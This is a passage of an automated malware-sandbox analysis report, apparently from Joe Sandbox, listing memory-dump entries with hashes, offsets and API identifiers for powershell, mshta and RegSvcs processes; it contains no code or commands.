                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 88M$XhT
                                                                                    • API String ID: 0-50409379
                                                                                    • Opcode ID: f01644ed20692df8b83e741b2856da1d6eb04296aa9298278e591e195a8859bd
                                                                                    • Instruction ID: 23fd1be2deb36ab337eb1fb7be9d790def0604bdad2bbdf93f016c5e7be254d7
                                                                                    • Opcode Fuzzy Hash: f01644ed20692df8b83e741b2856da1d6eb04296aa9298278e591e195a8859bd
                                                                                    • Instruction Fuzzy Hash: C881FE2190E7D60FEB53937858216A57FF1DF47650B0E41EBC4C9CB1A3D919AC0AC3A2

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: V
                                                                                    • API String ID: 0-1342839628
                                                                                    • Opcode ID: 675ac335b4be1ea86a9de04222bbf9ba35a1dd95a51a0a7f1d7d9d9e79ffe55e
                                                                                    • Instruction ID: 76203a8579d1a2dc8a73b5aa16c29ffdb68667995b780191aa31e27d9be447b4
                                                                                    • Opcode Fuzzy Hash: 675ac335b4be1ea86a9de04222bbf9ba35a1dd95a51a0a7f1d7d9d9e79ffe55e
                                                                                    • Instruction Fuzzy Hash: D5D1F53180E7C92FD34797285C156B67FA4EF47260F0911EBD48DCB0A3E619AD5AC3A2

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451509907.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: DownloadFile
                                                                                    • String ID:
                                                                                    • API String ID: 1407266417-0
                                                                                    • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                    • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                                                    • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                    • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1da66156b7ad1539b789ab88bec6ad979e51311f43443fdef523ca1ef250d2e
                                                                                    • Instruction ID: cfa4933420286063e32d01190f5090ac72ab51b493826e1bd4a3ef4255db9e4f
                                                                                    • Opcode Fuzzy Hash: d1da66156b7ad1539b789ab88bec6ad979e51311f43443fdef523ca1ef250d2e
                                                                                    • Instruction Fuzzy Hash: C622F33090CB894FD78ADB2C84916697BE2FF9A344F2401EED08ED72A3DA24AC55C741

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: acdad9d8afe866ba12097a09ce7281f4f5c096bcaf134fae1725ebd59e0e42b7
                                                                                    • Instruction ID: 8dcd60d43a69745e3c7ace8338a29dbaa9322c08613a7a9f452ca168d13afed5
                                                                                    • Opcode Fuzzy Hash: acdad9d8afe866ba12097a09ce7281f4f5c096bcaf134fae1725ebd59e0e42b7
                                                                                    • Instruction Fuzzy Hash: B641C301B0DBC90FE34B937C1854264BFE1EF4B655B2911EBC48ECB1A3E9099C6AC361
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0fb7e4a2025e30c280a5d5d6bec7b8dbe7784c7da25fa2c13f8466cb1d05589
                                                                                    • Instruction ID: a1a5740ec8d4a0c7ee118e22a0c9e964080e96a9c198d6bc272b1c4201c7d37e
                                                                                    • Opcode Fuzzy Hash: f0fb7e4a2025e30c280a5d5d6bec7b8dbe7784c7da25fa2c13f8466cb1d05589
                                                                                    • Instruction Fuzzy Hash: 62B1472080EBC91FD747A77868102A63FF1EF47254F1A01EBD48DCB1A3D6189D1AC362
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000003.467306964.0000000002D70000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_3_2d70000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction ID: d27ca64c316315b01ba0a1c2e87c6a7cccc230a9244e6265d098e816b3b60b12
                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction Fuzzy Hash:

                                                                                    Execution Graph

                                                                                    Execution Coverage:14.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:31.8%
                                                                                    Total number of Nodes:22
                                                                                    Total number of Limit Nodes:0

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &55p
                                                                                    • API String ID: 0-1955183375
                                                                                    • Opcode ID: cb4d0922580c999c5e86ed0434d9d169dbbf8a1575435622fd5283abe86c3e64
                                                                                    • Instruction ID: a8be3fc14019eac0c926a1c17de1657235b22a7e1edf9fb3050da3e0239d5281
                                                                                    • Opcode Fuzzy Hash: cb4d0922580c999c5e86ed0434d9d169dbbf8a1575435622fd5283abe86c3e64
                                                                                    • Instruction Fuzzy Hash: 6952CE74A01228CFDB65DF69C884B9DBBB2BF89300F5085EAD409A7255DB31AE85CF50

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(000000FF), ref: 003CFE1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ac217c9921425164bfad3e600270c038cb5cfb33a58ae2957e525d7d39f439aa
                                                                                    • Instruction ID: aed202b630b5bc88703eaf19d610b4a36d13b178ef68b02a5e3f10d15b324490
                                                                                    • Opcode Fuzzy Hash: ac217c9921425164bfad3e600270c038cb5cfb33a58ae2957e525d7d39f439aa
                                                                                    • Instruction Fuzzy Hash: 7A5113B4D00218CFDB19CFAAD888BDDBBB6BF88314F20C52AE415AB294D7749945CF54

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce40d3d0c90b02622b49a48f19ab382f6f9166b949dc4e4e48ac4640dd484e50
                                                                                    • Instruction ID: 85f385e6cd0e5232c3ce2bfe1b6d7e147a6e19c4e306b9ff8d2c43968fef843f
                                                                                    • Opcode Fuzzy Hash: ce40d3d0c90b02622b49a48f19ab382f6f9166b949dc4e4e48ac4640dd484e50
                                                                                    • Instruction Fuzzy Hash: 09827074E012288FDB64DF69C894BDDBBB2AF89300F1081EAD50DA7265DB759E85CF40

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6af05d0f12f2113f5db0fbaba8d5eeaa060caddcf119a7a9fd24b3b54a83649a
                                                                                    • Instruction ID: 3d5f1e2799647c036507626ee02f676f72fec9ecee2be711e35538a886acf2ef
                                                                                    • Opcode Fuzzy Hash: 6af05d0f12f2113f5db0fbaba8d5eeaa060caddcf119a7a9fd24b3b54a83649a
                                                                                    • Instruction Fuzzy Hash: 9572D174E00228CFDB65DF69C885BDDBBB2BB89300F1485EAD409A7255DB34AE85CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf830789d30d18c99d31607ddb8f8afcd24c00202bf7e818eb23f9870062ee99
                                                                                    • Instruction ID: 3da4edd0d0be03c263a115668117fb4dac90b6f48af7279e1eb7a0b9b493ad50
                                                                                    • Opcode Fuzzy Hash: cf830789d30d18c99d31607ddb8f8afcd24c00202bf7e818eb23f9870062ee99
                                                                                    • Instruction Fuzzy Hash: E1D1C474E04218CFDB14DFA5C994B9DBBB2BF88301F2081AAD809A73A5DB355E85CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b48e3802ff14c04c04fccbd52d7817aabe93a62e7257d3a44ad54292444bfe96
                                                                                    • Instruction ID: 66add867ec063cc849fed44e8e1bf3bfb6f4629a8010987bf4560eb41311c20b
                                                                                    • Opcode Fuzzy Hash: b48e3802ff14c04c04fccbd52d7817aabe93a62e7257d3a44ad54292444bfe96
                                                                                    • Instruction Fuzzy Hash: 15D1B374E01218CFDB14DFA5C994B9DBBB2BF89305F2080AAD809A73A5DB355E85CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 44f324ae5550ba76f5ce796ebfcdc45219408956fb1d4d9e597bd57dda196f49
                                                                                    • Instruction ID: 2bb227a07af3181f2ec0baef78a141cf3b11c4ce3dc60841819b364faaa54418
                                                                                    • Opcode Fuzzy Hash: 44f324ae5550ba76f5ce796ebfcdc45219408956fb1d4d9e597bd57dda196f49
                                                                                    • Instruction Fuzzy Hash: B3C1D478E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c756e931356fe49258e24adb83b2c2d96f8a65fb74195d349cbb199bcc371fa
                                                                                    • Instruction ID: 227eec3d780d623b720fc68a584bd9224a88e27e436ed6cdcb8d044a48e882ae
                                                                                    • Opcode Fuzzy Hash: 6c756e931356fe49258e24adb83b2c2d96f8a65fb74195d349cbb199bcc371fa
                                                                                    • Instruction Fuzzy Hash: 18C1D574E00218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a0f90bc8577519aa0a2898ff950f81d06973541245f79a988bbb0ce36c657ff9
                                                                                    • Instruction ID: 4de51a488e48f3514287b5be9083c582e7c279cc49d9e0c2096073ccad3676da
                                                                                    • Opcode Fuzzy Hash: a0f90bc8577519aa0a2898ff950f81d06973541245f79a988bbb0ce36c657ff9
                                                                                    • Instruction Fuzzy Hash: DFA11670D00218CFEB14DFA8C984BDDBBB1FF89304F209669E409AB291DB749A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19605b79b259ec28ab304a602a55c7755fa27949d1a3fc961e39e9907dfd2ee4
                                                                                    • Instruction ID: 8db1037b99637395338993541b17172d0aa79111ee7064f45c8969f9ef973053
                                                                                    • Opcode Fuzzy Hash: 19605b79b259ec28ab304a602a55c7755fa27949d1a3fc961e39e9907dfd2ee4
                                                                                    • Instruction Fuzzy Hash: 16A1A574E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ffb216e9ff1eee0845c2d2dfc3527182be9cf7e139b9ff35b8ba417d4f99abd
                                                                                    • Instruction ID: ff6eb2bab10de0238f48a5a2f67625f5c686acdecb697672d7758e0b2cdb15a5
                                                                                    • Opcode Fuzzy Hash: 6ffb216e9ff1eee0845c2d2dfc3527182be9cf7e139b9ff35b8ba417d4f99abd
                                                                                    • Instruction Fuzzy Hash: 8DA19474E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40CA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6015d4d44ed0facba3b72922b3df3603d7618e66935c50909f921c33f23c9cdf
                                                                                    • Instruction ID: 339677a37d60ffd41a8a07cecd3cf1372c871f314186e2643087022ee2991298
                                                                                    • Opcode Fuzzy Hash: 6015d4d44ed0facba3b72922b3df3603d7618e66935c50909f921c33f23c9cdf
                                                                                    • Instruction Fuzzy Hash: 31A1A575E012188FEB68CF6AC944B9EFBF2AF89300F14C0AAD40DA7251DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c845d52d8740d3c6a780543b19176fcb31e759caa6ea3db1dc35d6ffc55d4b6b
                                                                                    • Instruction ID: 644c18e0145653a68b4e3a466a8c55e28d0df6462381f30300cf699bf1db51f9
                                                                                    • Opcode Fuzzy Hash: c845d52d8740d3c6a780543b19176fcb31e759caa6ea3db1dc35d6ffc55d4b6b
                                                                                    • Instruction Fuzzy Hash: 39A19474E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f15eff3c3c62b968036783f1435344baf0361bdce725b9971a9eac1221f29315
                                                                                    • Instruction ID: 60d00d1a95baefdae431b990afff76dd83de42a06124c0572926a7a78eba6112
                                                                                    • Opcode Fuzzy Hash: f15eff3c3c62b968036783f1435344baf0361bdce725b9971a9eac1221f29315
                                                                                    • Instruction Fuzzy Hash: 91A18F74E012288FEB68DF6AC944B9DBBF2BF89300F14C1AAD40DA7255DB345A85CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 255c8209bd3d04f6249c0b51d936b19e0ef2f29e4b988937de111865b765b11d
                                                                                    • Instruction ID: c3577493b9a6e6975191112aa73a1286948cac51ae937c3bdfd927c984e11472
                                                                                    • Opcode Fuzzy Hash: 255c8209bd3d04f6249c0b51d936b19e0ef2f29e4b988937de111865b765b11d
                                                                                    • Instruction Fuzzy Hash: 44A19174E012288FEB68DF6AD944B9DBBF2BF89300F14C0AAD40DA7251DB345A85CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 89a4089a18bf3db34575c26f262ff92c0bc78c3f2b34300d95fae4b5bd39a60f
                                                                                    • Instruction ID: b0e5f129a4433f4cde800e296deefbee7d56d8d8771c53d59349adb22e333fee
                                                                                    • Opcode Fuzzy Hash: 89a4089a18bf3db34575c26f262ff92c0bc78c3f2b34300d95fae4b5bd39a60f
                                                                                    • Instruction Fuzzy Hash: B8A19574E012288FEB68DF6AC944B9DFBF2AF89300F14C1AAD409A7251DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: da5eadf1b6ef703f672a4c8d3145298019a38e1dedc7a28bd00235a69e353b91
                                                                                    • Instruction ID: c7cc758b79f5779d435143e5b9159faf3e5d6f203bdbeb188a3bec35622bcf81
                                                                                    • Opcode Fuzzy Hash: da5eadf1b6ef703f672a4c8d3145298019a38e1dedc7a28bd00235a69e353b91
                                                                                    • Instruction Fuzzy Hash: 00A1A574E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c86a9517022951ff9f812d5a80606fbdbd4fa3e9ef56c51bdaeb14ff2f8f033a
                                                                                    • Instruction ID: 26395f0f65acb532bc298902c93689b14685ed4c850c6da731f4036ee7c75c77
                                                                                    • Opcode Fuzzy Hash: c86a9517022951ff9f812d5a80606fbdbd4fa3e9ef56c51bdaeb14ff2f8f033a

                                                                                    Control-flow Graph
                                                                                    [Graph rendering not preserved. Nodes 1106-1141, first block 3cfec5-3cfed7; block 3cfe0a-3cfe2a calls LdrInitializeThunk.]
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

                                                                                    Control-flow Graph
                                                                                    [Graph rendering not preserved. Nodes 1174-1206, first block 3cfe53-3cfe5d; block 3cfe0a-3cfe2a calls LdrInitializeThunk.]
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3ea0199a4ab011ff6bbbad3ffcfa7c1d521803e62831a53c5da3ae82e6b3344
                                                                                    • Instruction ID: feaf58f1757f277627c71986ed68ae6aac765864354dce854da9f4e19b8358f0
                                                                                    • Opcode Fuzzy Hash: a3ea0199a4ab011ff6bbbad3ffcfa7c1d521803e62831a53c5da3ae82e6b3344
                                                                                    • Instruction Fuzzy Hash: 04C1C574E00218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a80a9e35d6e7dec190acda220ccacdac6982c0452b9bccd363c8aff813eef28c
                                                                                    • Instruction ID: 8d24b035c63bb8fedf66b5fa0e1b5dcd41e6a4032d1ddf2090cd1dc48cff35ae
                                                                                    • Opcode Fuzzy Hash: a80a9e35d6e7dec190acda220ccacdac6982c0452b9bccd363c8aff813eef28c
                                                                                    • Instruction Fuzzy Hash: 20C1D674E00218CFDB54DFA5C994BADBBB2BF89300F2480AAD409AB395DB355E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39c13fa2d1503eef952c690d1d3a38d9caeff09ab70e3604dd4d7b85a9896a7c
                                                                                    • Instruction ID: 347464ae83febd78ff559b90ac3ecb163ed8ace82298eab444df559078b45018
                                                                                    • Opcode Fuzzy Hash: 39c13fa2d1503eef952c690d1d3a38d9caeff09ab70e3604dd4d7b85a9896a7c
                                                                                    • Instruction Fuzzy Hash: 54C1D778E00218CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB365DB355E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc5f22addd978ca52c18aed0c92db185af24ceb798ca90e2f13bcd6474b0043b
                                                                                    • Instruction ID: dd3173a4c99a6c1dfa0cc9ebb89e308fefbbb0fb9dbb4ee5b9b3ddcc8001cac7
                                                                                    • Opcode Fuzzy Hash: bc5f22addd978ca52c18aed0c92db185af24ceb798ca90e2f13bcd6474b0043b
                                                                                    • Instruction Fuzzy Hash: 35C1C678E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB355E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aeef1b2c5f8d9e99b989e8be247ca108146a76946c782147f5e9c767626aabb5
                                                                                    • Instruction ID: 9f96f17b0cfc279a280c9942e9f02a3ec92161a4146af1c860840dc687537ec7
                                                                                    • Opcode Fuzzy Hash: aeef1b2c5f8d9e99b989e8be247ca108146a76946c782147f5e9c767626aabb5
                                                                                    • Instruction Fuzzy Hash: 0BC1C578E00218CFDB54DFA5C995BADBBB2BF89300F2080AAD409AB355DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63148f568cdd397a15ce2c8a90d5a005d689f08fa636a18eef284ca57088aa25
                                                                                    • Instruction ID: 36f8ccf621fdf10b763c14ebff02a711e784b484350e21bc6ed0d11a85acd596
                                                                                    • Opcode Fuzzy Hash: 63148f568cdd397a15ce2c8a90d5a005d689f08fa636a18eef284ca57088aa25
                                                                                    • Instruction Fuzzy Hash: 24C1C678E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c462f95cd26f40ea5f1d7c8e62e78f4163d30c7af57517fc57b388f9eba11bd
                                                                                    • Instruction ID: f585f2764365db12f9c96ac6911b107837ed46cdd7e960ec0c440b3dd80a071e
